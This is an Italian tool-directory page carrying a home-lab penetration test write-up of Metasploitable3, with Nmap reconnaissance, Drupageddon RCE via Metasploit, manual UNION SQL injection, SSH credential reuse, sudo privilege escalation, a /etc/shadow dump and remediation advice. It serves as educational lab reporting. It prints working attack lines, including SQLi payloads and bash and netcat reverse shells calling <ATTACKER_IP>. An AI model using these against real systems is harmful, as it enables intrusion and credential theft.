Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
metasploitable3-pentest-writeup — Report di penetration test in home-lab di Metasploitable3 che copre la ricognizione Nmap, RCE Drupalgeddon, SQL injection, riutilizzo delle credenziali SSH, escalation dei privilegi sudo e reverse shell. | Kitploit
Strumenti/GitHubGitHub/adfortunato/metasploitable3-pentest-writeup
Escalation di PrivilegiRicognizioneAttacchi alle PasswordAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPost-ExploitCTFPenetration Testing

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Apprendimento e Formazione
Lab e Pratica
GitHubadfortunato/metasploitable3-pentest-writeup

metasploitable3-pentest-writeup

Report di penetration test in home-lab di Metasploitable3 che copre la ricognizione Nmap, RCE Drupalgeddon, SQL injection, riutilizzo delle credenziali SSH, escalation dei privilegi sudo e reverse shell.

Vedi Repository
119h 15m faNon ancora revisionato

Metasploitable3 — Report di Penetration Test

Autore: Arlen Fortunato
Data: Settembre 2026
Ambiente: Parrot OS (attaccante) → Metasploitable3 Ubuntu 14.04 (target)
Scope: Penetration test completo di rete — enumerazione, exploitation, privesc, post-exploitation
Tipo: Home Lab / Esercitazione Capture The Flag

⚠️ Tutte le credenziali riportate di seguito sono redatte. Si è trattato di un esercizio legale in un home lab isolato.


Strumenti Utilizzati

StrumentoRuolo
NmapPort scan, rilevamento servizi/versioni, OS fingerprint
Metasploit (msfconsole)Exploitation (CVE-2014-3704), gestione sessioni
msfvenomGenerazione payload (reverse shell bash/netcat)
nc (netcat)Listener per reverse shell
curl / sedCreazione manuale di SQLi + formattazione output HTML
ssh / scpAccesso remoto, validazione credenziali
openssl s_clientVerifica servizi TLS/SSL
gobusterDirectory brute-forcing (enumerazione web)

Ricognizione — Nmap Full Port Scan

root@kitploit:~
nmap -O -sV -p- -oA metasploitable3 <TARGET_IP>

OS: Linux Ubuntu 14.04, Kernel 3.13.0-24-generic x86_64


Riepilogo delle Vulnerabilità


Dettagli delle Vulnerabilità

1. UnrealIRCd 3.2.8.1 (CVE-2010-2075) — Falso Positivo

Vulnerabilità: UnrealIRCd 3.2.8.1 è stato storicamente distribuito con un binario trojanizzato che esegue comandi arbitrari quando un client non autenticato invia una stringa trigger prima della registrazione — RCE come utente del daemon IRC.

Tentativo di exploitation: Modulo Metasploit exploit/unix/irc/unreal_ircd_3281_backdoor con payload cmd/unix/reverse_perl, cmd/unix/reverse_netcat, cmd/unix/reverse_bash. L'auto-check del modulo ha segnalato il servizio come vulnerabile; nessuna sessione restituita con alcun payload.

Troubleshooting eseguito:

  • Porta raggiungibile (nc -vz)
  • Porta confermata come IRC in chiaro, non TLS (openssl s_client)
  • Connessione inversa manuale dal target confermata, il networking in uscita funziona
  • Trigger manuale della backdoor tramite nc ha restituito l'errore di protocollo IRC 451 — comando interpretato come comando IRC, mai eseguito

Conclusione: Il banner di versione indica la build vulnerabile, ma la backdoor è assente in questa istanza (binario pulito/ricompilato). Classificato non sfruttabile — falso positivo, con evidenze.


2. Drupal 7.5 — Drupageddon (CVE-2014-3704)

Vulnerabilità: Drupal 7.x precedente alla 7.32 contiene una SQL injection critica nel livello di astrazione del database che consente remote code execution non autenticato.

Conferma versione: CHANGELOG.txt → "Drupal 7.5, 2011-07-27"

Exploitation:

root@kitploit:~
msfconsole
use exploit/multi/http/drupal_drupageddon
set RHOSTS <TARGET_IP>
set TARGETURI /drupal/
set LHOST <ATTACKER_IP>
set payload php/meterpreter_reverse_tcp
run

Risultato:

root@kitploit:~
getuid  → www-data
sysinfo → Linux ubuntu 3.13.0-24-generic x86_64
pwd     → /var/www/html/drupal

Enumerazione post-exploitation:

  • /var/www/html: chat/, drupal/, payroll_app.php, phpmyadmin/
  • /home: 16 account utente

3. App Payroll — SQL Injection Basata su UNION (Manuale)

Vulnerabilità: Form di login di payroll_app.php, SQL injection nel campo password. Nessuna automazione utilizzata — creata tramite curl.

Passo 1 — Bypass dell'autenticazione:

root@kitploit:~
' or 1=1#

' chiude la stringa SQL, or 1=1 forza il vero, # commenta la virgoletta finale.

Passo 2 — Conteggio colonne + mappatura visualizzazione:

root@kitploit:~
' UNION SELECT null, null, null, null#     -- no error = 4 columns
' UNION SELECT 1, 2, 3, 4#                 -- markers: 1=Username, 2=First, 3=Last, 4=Salary

Passo 3 — Enumerazione information_schema:

DomandaRisposta
Versione DB / utenteMySQL 5.5.62, root@localhost

Passo 4 — Dump (password redatte):

root@kitploit:~
' UNION SELECT username, password, salary, null FROM users#

4. SSH — Credenziali di Default e Riutilizzo delle Credenziali

Percorso 1 — Account di default: coppia di credenziali di default vagrant autenticata via SSH → utente nel gruppo sudo con (ALL : ALL) NOPASSWD: ALL.

Percorso 2 — Riutilizzo delle credenziali: credenziali raccolte dal dump SQLi autenticate direttamente via SSH come altro utente del lab (luke_skywalker, gruppo sudo, (ALL : ALL) ALL).

Significato: dimostra il riutilizzo di credenziali tra servizi — credenziali applicative mappate su un account di sistema.


5. Privilege Escalation (Due Percorsi)

  • Percorso A: vagrant → sudo -l mostra NOPASSWD: ALL → sudo su - → uid=0(root).
  • Percorso B: luke_skywalker → sudo (ALL : ALL) ALL → sudo su - → uid=0(root).

Nessun exploit locale necessario — entrambi gli account possiedono permessi sudo eccessivamente permissivi.


6. Dump dello Shadow

root@kitploit:~
sudo cat /etc/shadow

Estratti 16 hash md5crypt ($1$) — raccolta completa delle credenziali post-privesc.


7. Post-Exploitation — Reverse Shell

Payload 1 — bash:

root@kitploit:~
bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1

Catturata su nc -lnvp 4444 → shell interattiva.

Payload 2 — netcat (named-pipe):

root@kitploit:~
mkfifo /tmp/fifo; nc <ATTACKER_IP> 4445 0</tmp/fifo | /bin/sh >/tmp/fifo 2>&1; rm /tmp/fifo

Catturata su nc -lnvp 4445 → shell interattiva.

Meccanismo: la named pipe (FIFO) collega stdin/stdout di netcat a /bin/sh, formando un tunnel bidirezionale su singolo socket; la FIFO viene rimossa successivamente.


Raccomandazioni di Remediation


Disclaimer

Tutti i test sono stati eseguiti esclusivamente in un home lab isolato utilizzando software intenzionalmente vulnerabile (Rapid7 Metasploitable3). Nessun sistema di produzione o target non autorizzato è stato coinvolto. Questo report è a scopo educativo e di sviluppo personale delle competenze.

Scarica lo strumento
PortaStatoServizioVersione
21/tcpopenFTPProFTPD 1.3.5
22/tcpopenSSHOpenSSH 6.6.1p1
80/tcpopenHTTPApache httpd 2.4.7 (Ubuntu)
445/tcpopenSMBSamba smbd 3.X–4.X
631/tcpopenIPPCUPS 1.7
3306/tcpopenMySQLMySQL (unauthorized)
3500/tcpopenHTTPWEBrick httpd 1.3.1 (Ruby 2.3.8)
6697/tcpopenIRCUnrealIRCd
8080/tcpopenHTTPJetty 8.1.7.v20120910
#VulnerabilitàCVE / TipoPortaGravitàRisultato
1Fingerprint versione UnrealIRCd — probe backdoorCVE-2010-20756697⚠️ Falso positivoAuto-check del modulo superato, probe manuale fallito — backdoor assente nella build
2Drupal 7.5 — Drupageddon RCECVE-2014-370480🔴 CriticaShell Meterpreter come www-data
3App Payroll — UNION SQLi (manuale)Iniezione manuale80🔴 CriticaDump completo del DB (15 utenti, password in chiaro — redatte)
4SSH — credenziali di default + riutilizzoDefault / riutilizzo credenziali22🔴 Criticavagrant (NOPASSWD sudo), luke_skywalker (sudo ALL)
5Privilege escalation (due percorsi)Sudo mal configuratoN/A🔴 Criticaroot tramite entrambi gli account
6Dump dello shadowPost-exploitationN/A🔴 Critica16 hash md5crypt estratti
7Reverse shell (bash + netcat)msfvenom / creazione manuale4444/4445🟠 AltaShell interattive catturate sul listener dell'attaccante
Databaseinformation_schema, drupal, mysql, payroll, performance_schema
Tabelle in payrollusers
Colonne in usersusername, first_name, last_name, password, salary
UsernamePasswordSalary
leia_organa[REDACTED]9560
luke_skywalker[REDACTED]1080
han_solo[REDACTED]1200
artoo_detoo[REDACTED]22222
boba_fett[REDACTED]20000
greedo[REDACTED]50000
(+ 9 altri account)[REDACTED]—
VulnerabilitàRaccomandazione
Fingerprint versione UnrealIRCdVerificare l'integrità della sorgente del binario (checksum); aggiornare o rimuovere
Drupal 7.5Aggiornare all'ultima versione stabile; applicare SA-CORE-2014-005
SQLi PayrollQuery parametrizzate / prepared statement; validare l'input
Credenziali SSH di defaultRuotare/rimuovere gli account di default; imporre autenticazione basata su chiave
Sudo con privilegi eccessiviApplicare il principio del minimo privilegio; rimuovere le concessioni NOPASSWD indiscriminate
Riutilizzo delle credenzialiImporre password uniche per servizio; policy sulle password
Hashing debole delle passwordMigrare da md5crypt → bcrypt / Argon2id